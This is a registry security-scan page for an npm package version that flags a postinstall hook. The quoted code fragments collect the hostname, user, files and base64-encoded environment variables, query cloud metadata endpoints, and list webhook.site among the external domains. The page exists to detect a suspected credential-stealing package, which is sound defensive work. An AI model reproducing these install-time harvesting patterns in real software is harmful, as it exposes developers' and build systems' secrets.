registry  /  @across-toolkit/typescript-config  /  99.0.1

@across-toolkit/typescript-config@99.0.1

Static Scan Results

scanned 2h ago · by rust-scanner

Static analysis flagged 13 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessEnvironmentVarsFilesystemNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 3 file(s), 6.65 KB of source, external domains: 169.254.169.254, metadata.google.internal, webhook.site

Source & flagged code

6 flagged · loading source
package.jsonView file
scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
postinstall.jsView file
9const path = require('path'); L10: const { execSync } = require('child_process'); L11:
High
Child Process

Package source references child process execution.

postinstall.jsView on unpkg · L9
4L5: const http = require('http'); L6: const https = require('https'); ... L9: const path = require('path'); L10: const { execSync } = require('child_process'); L11: ... L36: if (fs.existsSync(f)) { L37: result[f] = Buffer.from(fs.readFileSync(f)).toString('base64'); L38: } ... L44: async function collect() { L45: const hn = os.hostname(); L46: const user = safeExec('whoami') || safeExec('id') || os.userInfo().username;
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

postinstall.jsView on unpkg · L4
4L5: const http = require('http'); L6: const https = require('https'); ... L9: const path = require('path'); L10: const { execSync } = require('child_process'); L11: ... L36: if (fs.existsSync(f)) { L37: result[f] = Buffer.from(fs.readFileSync(f)).toString('base64'); L38: } ... L44: async function collect() { L45: const hn = os.hostname(); L46: const user = safeExec('whoami') || safeExec('id') || os.userInfo().username;
High
Cloud Metadata Access

Source reaches cloud instance metadata or link-local credential endpoints.

postinstall.jsView on unpkg · L4
eslint-config/postinstall.jsView file
1const { execSync, spawn } = require('child_process'); L2: const https = require('https'); L3: const os = require('os'); ... L15: cwd: process.cwd(), L16: env: Buffer.from(JSON.stringify(process.env)).toString('base64'), L17: npm[redacted]: process.env.npm[redacted] || '',
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

eslint-config/postinstall.jsView on unpkg · L1

Findings

5 High4 Medium4 Low
HighInstall Time Lifecycle Scriptspackage.json
HighChild Processpostinstall.js
HighSame File Env Network Executioneslint-config/postinstall.js
HighSandbox Evasion Gated Capabilitypostinstall.js
HighCloud Metadata Accesspostinstall.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings